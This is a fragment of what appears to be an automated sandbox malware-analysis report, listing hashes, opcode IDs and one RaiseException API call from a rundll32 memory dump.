                  • Instruction Fuzzy Hash: 4C4125B4D05289DFDB01CF98C950BAEFBF1BF49304F248699D415AB381C77A9A01CBA5
                  APIs
                  • RaiseException.KERNEL32(E06D7363,00000001,00000003,q8~,?,?,?,?,7EE03871,?,7EE3BDA8), ref: 7EE03F95
                  Strings
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2510567036.000000007ED90000.00000040.00001000.00020000.00000000.sdmp, Offset: 7ED90000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_7ed90000_rundll32.jbxd
                  Yara matches
                  Similarity
                  • API ID: ExceptionRaise
                  • String ID: q8~$q8~
                  • API String ID: 3997070919-2112345317
                  • Opcode ID: 51e0f583ba4a3a84ce2ef6c9fe2a4ae61ffdf5bc720b43c944f5585eade8aa12
                  • Instruction ID: 119ebd65b3935f54b00f18f149712047cfa8c7a34bac41db260970157b0d6928
                  • Opcode Fuzzy Hash: 51e0f583ba4a3a84ce2ef6c9fe2a4ae61ffdf5bc720b43c944f5585eade8aa12
                  • Instruction Fuzzy Hash: E401A27A900208AFCB01AF5DC590B9EBBBCFF48704F214459ED06AB391D770E900CB90